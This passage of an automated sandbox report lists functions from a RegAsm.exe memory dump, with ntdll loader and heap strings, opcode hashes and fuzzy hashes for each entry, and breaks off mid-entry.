Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 55979a6fad0a71a579ffcdcb4c14614272f5c0f095c962193b2c640539f7676e
Instruction ID: 38b27642a4930c5522f7317477c7e87b83b4b727b8dcd886c1aa10e19fe7ca9d
Opcode Fuzzy Hash: 55979a6fad0a71a579ffcdcb4c14614272f5c0f095c962193b2c640539f7676e
Instruction Fuzzy Hash: A841BC7AD04768CBEB25DBA6C8C4BADB7B8EF49350F28045AD901AF7D1D6749901CB10

Function 033D4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 033D4888
minkernel\ntdll\ldrredirect.c, xrefs: 033D4899
LdrpCheckRedirection, xrefs: 033D488F

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 8a3ea4f37e8d1daaaf57dc4e217a4a3f1866bd8f96ebab85ead9541901106d43
Instruction ID: 6d2a6dea92a33f1b50526de629cba0f2c904fb44cb381b91a7cf145f390771db
Opcode Fuzzy Hash: 8a3ea4f37e8d1daaaf57dc4e217a4a3f1866bd8f96ebab85ead9541901106d43
Instruction Fuzzy Hash: 6F41C637A003509FCB21CF6AF9C0A26B7E9BF49691F090569FC58EB211DB31D800CB91

Function 03360BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 033B543E
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 033B5449
HEAP[%wZ]: , xrefs: 033B5431

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 1c4ff75765c6d9b2d97bb1cd42e99c7aeafd84f827feadb50815fa457868510d
Instruction ID: afc57ae6d15ce02e020f49600eca67907f19ce1f71b3e082f5ff623dcbe07220
Opcode Fuzzy Hash: 1c4ff75765c6d9b2d97bb1cd42e99c7aeafd84f827feadb50815fa457868510d
Instruction Fuzzy Hash: CB1190353192419FEB1CD725C8C2B69F3A8EF4261AF18C16DE416CFA95DB34E880C750

Function 033D20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

LdrpInitializationFailure, xrefs: 033D20FA
minkernel\ntdll\ldrinit.c, xrefs: 033D2104
Process initialization failed with status 0x%08lx, xrefs: 033D20F3

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 39f2c23fc7ee41ae602b16ada1dadec283ef3d7ed9984547e25b1b40aa368277
Instruction ID: 974e823c5003065cafc945da6e643fd83719139cff50bb23f23772da34d9c6a0
Opcode Fuzzy Hash: 39f2c23fc7ee41ae602b16ada1dadec283ef3d7ed9984547e25b1b40aa368277
Instruction Fuzzy Hash: 81F0C879A40308AFD714EB49DDC2F9A77A8EB41F54F144465F640BF281D6B0E900CA91

Function 033603E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 033B4D8A

Strings

#%u, xrefs: 033B4D82

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 8da0f2aebfff86d1e452d850d443c1ceee75deaf672f02b45ce5052622204c19
Instruction ID: fa3464a2f14cf1ff2c94c3e1b58062ba39523f0b5efab1ea8efbb218d8a31ae7
Opcode Fuzzy Hash: 8da0f2aebfff86d1e452d850d443c1ceee75deaf672f02b45ce5052622204c19
Instruction Fuzzy Hash: 03717A75E0020A9FDB05DFA9D990BAEB7F8EF08744F154065E901EB252EA38ED41CB64

Function 0335A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 0335AA13
LdrResSearchResource Exit, xrefs: 0335AA25

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: d1be93233529be7bd77047eeebe789a34d1e9cf770165570d82e203ddae97597
Instruction ID: e8b3878fda625003aa6b4b78807965137d2f6428ab632ceecf8854ca249f8938
Opcode Fuzzy Hash: d1be93233529be7bd77047eeebe789a34d1e9cf770165570d82e203ddae97597
Instruction Fuzzy Hash: 4EE15A75E10259ABEB22CA99CDC0FEEB7BDAF48310F184666FE01EB650D7349940DB50

Function 0341A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 0341A551
`, xrefs: 0341A44B

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 5482cd71a3ce7abe5329b5fe04aad7f36d0e7fa6eac955f15c929b018abef1b2
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 49C1E032209B419FDB24CF29C844B6BFBE5AF84318F084A2EF595CE290D774D525CB89

Function 033CE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 033CE751
Legacy, xrefs: 033CE75A

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 881471ac5e61c6aed230c1ef1795bb4efea781f36e456a2ac11a15b4db32c723
Instruction ID: b9a600b4938072917155aeeb35a164213bc2a68ccd951836fc9280cba460e67d
Opcode Fuzzy Hash: 881471ac5e61c6aed230c1ef1795bb4efea781f36e456a2ac11a15b4db32c723
Instruction Fuzzy Hash: 44616E76E107599FDB14DFA8C880BAEBBB9FB48702F14806EE559EB251D731AD00CB50

Function 033F43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

@, xrefs: 033F4437
MUI, xrefs: 033F4525

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 5fbe4c86563f1bdd143be774c2ff3e2dae9ab493d74b22266926d3ce0c843ec9
Instruction ID: 0b8e762c4e7fef243d88fb84c89df6f5c6a96ad64c4ebbb83b3f381a25d370f6
Opcode Fuzzy Hash: 5fbe4c86563f1bdd143be774c2ff3e2dae9ab493d74b22266926d3ce0c843ec9
Instruction Fuzzy Hash: 33513875E0161DAEDF11DFA5CCC0EEFBBB8EB04754F14052AE615BB290DA309A45CB60

Function 033504E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0335063D
kLsE, xrefs: 03350540

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: e1961e7027b66f178b61fdd8adb5f21477bf5effacbaf8fba3ef06382fe98199
Instruction ID: 911db1914d03778034dba384e1ed7703e5ff38f94a4da060925cca0a7d174bee
Opcode Fuzzy Hash: e1961e7027b66f178b61fdd8adb5f21477bf5effacbaf8fba3ef06382fe98199
Instruction Fuzzy Hash: 9651AFB55057428FD728EF64C9C0AA7B7E8EF85304F04483EF9AA87240E776D545CB92

Function 0335A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 0335A309
RtlpResUltimateFallbackInfo Enter, xrefs: 0335A2FB

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 9e7724f2fd3fbb0d6be2a813161715b9409662293d545d93c536c39049f54a9f
Instruction ID: 1cf843d868aef006445a742b565d8866224d18f36685148609e7183dcb547fb7
Opcode Fuzzy Hash: 9e7724f2fd3fbb0d6be2a813161715b9409662293d545d93c536c39049f54a9f
Instruction Fuzzy Hash: 2441BC35A04649DBCB12CF59C8C0FAAB7B8FF95304F1846A5ED00DB6A1E735D900CB40

Function 0338A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 0338A5E4
Threadpool!, xrefs: 0338A5E9

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 479f8b5c8f7f4ae938b07cf1d20ba41a968e867f05953a942ae35de7721b30fd
Instruction ID: ac48b2ba6e684afc69ba5ebb9ef5c6fc5d72b0629cb8b1a3361ce7f2fcbb16ec
Opcode Fuzzy Hash: 479f8b5c8f7f4ae938b07cf1d20ba41a968e867f05953a942ae35de7721b30fd
Instruction Fuzzy Hash: 4F01F4B2651704AFE311EF14CD86F26B7E8E745715F01893AE558CB194E334D904CB4A

Function 0335C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0335C8C3, 0335CA40

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: d78aac87a89b822e0c18d509e714877f9d0dc9adc3c5b5c938e20707c4c7dba1
Instruction ID: f74aa9b6d061bfaac51684d0c4c1527faacc02b9088cc595ac26a5660c52fd04
Opcode Fuzzy Hash: d78aac87a89b822e0c18d509e714877f9d0dc9adc3c5b5c938e20707c4c7dba1
Instruction Fuzzy Hash: F2824875E003599FDB24CFA9C8C0BADFBB5BF48714F18816AEC59AB250DB349981CB50

Function 033D6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 033D65C1

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 63b1976094404d7c900a2b9327b604d22ebf05d78799c0204139aa52e21dac49
Instruction ID: 1107df1cadca68dc358f17e62891ad666bb5d40655f49c918d9295eb2f5e7b15
Opcode Fuzzy Hash: 63b1976094404d7c900a2b9327b604d22ebf05d78799c0204139aa52e21dac49
Instruction Fuzzy Hash: 6C917E76A01219AFEB21DB94DCC6FAEB7B8EF08B50F544065F610AF190D775AD04CBA0

Function 033FE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 033FE1FA

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: d7493f19b563bee03e656b4f6ca22af25b33f773ebba5f14a9b0677dc3832998
Instruction ID: 45e92f0d5cd09fbdf802f06e15e76e955df6eb9f8d3507308696a03dd1708cad
Opcode Fuzzy Hash: d7493f19b563bee03e656b4f6ca22af25b33f773ebba5f14a9b0677dc3832998
Instruction Fuzzy Hash: 08917036A01608BEDB22EBA5DCC4FAFBB7DEF45750F540026F605AB260EB749901CB51

Function 0338A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 033C67C9

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 000c0a5422e8674ab907bdf3cb3f069c37d80c44ff453eb31c37521fda97d6f5
Instruction ID: aa3aad3347a78b4c5d88e8399d76ff1b4a4f87ea210d519e0462bf466145cc54
Opcode Fuzzy Hash: 000c0a5422e8674ab907bdf3cb3f069c37d80c44ff453eb31c37521fda97d6f5
Instruction Fuzzy Hash: 7E717B75E1034A9FDF28DF98C9D1AADBBB5BF88700F18856EE805AB244D7359C01CB60

Function 033F4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 033F4A7F

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: b5a5695194c5c3f712bde313b91c8b6273cf236b443b41701ec772ed1875277f
Instruction ID: 737c90afa054e1b196cd82e54d43a3a7682f7a9c6ac58cc4d62d728a599ee30c
Opcode Fuzzy Hash: b5a5695194c5c3f712bde313b91c8b6273cf236b443b41701ec772ed1875277f
Instruction Fuzzy Hash: CB517E76D013299FDF10DF9AD8C0AAFF7B8AF44A10F45422AEA11BB250D7349D01CBA4

Function 0336E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0336E6A4

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: b4827dbf850658ed30d4fadde2dd8ba0a1f34491a0b33fee4d94c2af7c563aeb
Instruction ID: 2198fc346ea8ea0012275bec7be0470dac8e56789ac35f31643b1c88b1050b49
Opcode Fuzzy Hash: b4827dbf850658ed30d4fadde2dd8ba0a1f34491a0b33fee4d94c2af7c563aeb
Instruction Fuzzy Hash: 3141D17A9183019FD720DA74CAC0B6BB7ECAF88714F04892DF984DB184E774DA08C792

Function 033CC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 033CC77F

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 23950c23645e36c6d744b44bbc8da416eb7c67287d8337be1af10665cd73e88d
Instruction ID: fd32859982507183b5c5dff8fc85ab201759d8a893b859ac424147673a7748b3
Opcode Fuzzy Hash: 23950c23645e36c6d744b44bbc8da416eb7c67287d8337be1af10665cd73e88d
Instruction Fuzzy Hash: 284142B6D1176CAADF21DA50CCC4FDEB77CAB45714F0045E9AA08AB140DB709E898FA4

Function 033E6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 033E6B91

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 579bdfd55e8fcdbc92e6539ec586ce279971c43fb89bb9c3b809472049430195
Instruction ID: 0bfc6d5c7d5fa75f0f6485c6978b4881f3771f9e96ad30ce82b94a11f5f3823b
Opcode Fuzzy Hash: 579bdfd55e8fcdbc92e6539ec586ce279971c43fb89bb9c3b809472049430195
Instruction Fuzzy Hash: C0311431A007399BEB21DB69CCD1BAEB7A8DF55704F144069E841AF2C2D775E805CB50

Function 033CCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 033CCAA2

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 2f349a695a6dbbba02364fd18575082ddb3c01146ab006fb01832e82f533d983
Instruction ID: 84463e71d72189119a471c59ca517184ecfb13ba8102d385d752cc7bd3e03e86
Opcode Fuzzy Hash: 2f349a695a6dbbba02364fd18575082ddb3c01146ab006fb01832e82f533d983
Instruction Fuzzy Hash: 5231053AD51659AFEB15DA98C885E6FF778EB80720F05416DE809AB250D730AE02C7E0

Function 033D892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 033D895E

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: dbae32286ee7f427f63ecf7e8ad6f4b4effa0b1ed230005f06bba635705e8fee
Instruction ID: ed3b3523931dd253cca1c8dc8de2411bb71868ccce389153d22efdc726a71cc6
Opcode Fuzzy Hash: dbae32286ee7f427f63ecf7e8ad6f4b4effa0b1ed230005f06bba635705e8fee
Instruction Fuzzy Hash: 0701A737600300AFEA24EF55FCC4E9AB7A5FF86650B081469F5831E552CB30B841CA96

Function 033F2000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13bf4c434210d53f9118f0ef0563865cf8e1f2fd47aa3b75cacc594be88970e8
Instruction ID: 75aff5151df14f00e0d76bd2750fa34122938c15ea33b8d7d5ddc211253eec36
Opcode Fuzzy Hash: 13bf4c434210d53f9118f0ef0563865cf8e1f2fd47aa3b75cacc594be88970e8
Instruction Fuzzy Hash: 1042AF7AA08341DFD725DF64C8D0A6BF7E9AB88300F880D2DFA86D7260D675D845CB52

Function 033E8158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9e2040f06e07820e562051309ea09eeb37f63f885fdaa2401f1f5f62fc6d459
Instruction ID: 7af4cde435226abf890a0f9bd0ceb918638eb090af24bc5462af7ec22198f6d2
Opcode Fuzzy Hash: b9e2040f06e07820e562051309ea09eeb37f63f885fdaa2401f1f5f62fc6d459
Instruction Fuzzy Hash: 50423975E002299FEB24CF69CC81BADF7F5BF88701F188199E949AB281D7349985CF50

Function 03362840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 193fc20d4177dcd38f8799eccec7027d86d21ca33fa3d9fe34ebe778911d6f66
Instruction ID: d9c596eb27ed380f085ef06a511ab17be304c3ea1450c69d98b37b7afc61bfde
Opcode Fuzzy Hash: 193fc20d4177dcd38f8799eccec7027d86d21ca33fa3d9fe34ebe778911d6f66
Instruction Fuzzy Hash: 6932FD74A007158FDB24CF69C8857BEFBF6BF84300F18852DD6869BA86D735A852CB50

Function 033FA118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ed287c7bb860dad7ee13183451f0a2527d6fa74937ac0b67ab37b8521a41f08
Instruction ID: 04198d7e124b4a2771a1b9dc363633bea5a34a8ee41f9f1a95653c1d9f2d6158
Opcode Fuzzy Hash: 7ed287c7bb860dad7ee13183451f0a2527d6fa74937ac0b67ab37b8521a41f08
Instruction Fuzzy Hash: 9522DD742046518FDB24CF29C8D0772B7F5AF44300F88849AEA9E8F686E735E496DF60

Function 03356A50 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f793c297db5c38138261d35c62faa78a08f9366a30af1c5e9b503c45e946d82a
Instruction ID: 077885562eb343b4b0d51be4ca6828987894db303d7e2abbe4aa4afd8303f608
Opcode Fuzzy Hash: f793c297db5c38138261d35c62faa78a08f9366a30af1c5e9b503c45e946d82a
Instruction Fuzzy Hash: C4329D75A01204CFDB24CF69C8D0BAAB7F5FF48310F5885AAE956AB791D734E841CB90

Function 03374A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: ad9abbdb060717c5bb94489a787ff797edf79881000b88f4614db4c00511a1af
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: B7F16175E002199BDB24CF95C9C0BEEF7B9AF48710F098169E945AB750E778E841CB50

Function 033E892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ffb7375b258a180039d8cc9b459a14dd9387f477a19b80e7de6f9b2d02a53ae
Instruction ID: 4c56a65d446b475c48cc45d106325b0407af4006003bf9a0ea91cc57e5a8aa5a
Opcode Fuzzy Hash: 8ffb7375b258a180039d8cc9b459a14dd9387f477a19b80e7de6f9b2d02a53ae
Instruction Fuzzy Hash: 5BD1E271E0062A8FDF15CF98C881AFEB7F5AF88B04F188169D855EB280D735E905CB60

Function 033565D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0b3b945e736bf436797c690e86ae6f64a1cf1422dcd566bc250e4b57bd6169b
Instruction ID: 1d1b46942c64b629ebbba843e9121497f630f45d6462e2bb806f7b261b5a27ef
Opcode Fuzzy Hash: f0b3b945e736bf436797c690e86ae6f64a1cf1422dcd566bc250e4b57bd6169b
Instruction Fuzzy Hash: F0E167756093418FC714CF28C4D0A6AFBE4BF89314F498AADF9998B351DB31E905CB92

Function 03348397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fde9120ec62f544013929082c821d41f4030a1aadaa7f4e78e1eec5b7e58288
Instruction ID: 3c9ff439b51f4c0bbcb6aad59bfb0f38d2c8d4374683b3f936c041ba0100dd29
Opcode Fuzzy Hash: 4fde9120ec62f544013929082c821d41f4030a1aadaa7f4e78e1eec5b7e58288
Instruction Fuzzy Hash: 8CD1CC75A0071A9BDF14DF28C8D0ABAB7E9EF44304F098669F916DF290EB35E941CB50

Function 033D8243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: b9338d1d7580a20ebbc8055b8ea8b0385efcd87bcfc6707143f5784dffe19311
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: 08B1917AA00705AFDB24DF95D9C0AABB7B9FF84314F148469A9029F794DA34F905CB10

Function 03360535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: 9d1ce482ce81a6c5022d279dedb14d43689a0a82973a35c1c8355a7dc0d49dd8
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 83B16875A08745AFDB25CB68C8D0BBEF7FAEF44200F1841A9E642DB686D730E941CB50

Function 033583C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c3638df5371979d075c057ac1b35b26317cd9fee6a2c8536c8354585d6468d6
Instruction ID: f98b8867eea1e06f5954aec697abfdab48565ab34f4e1541316f83241feb540b
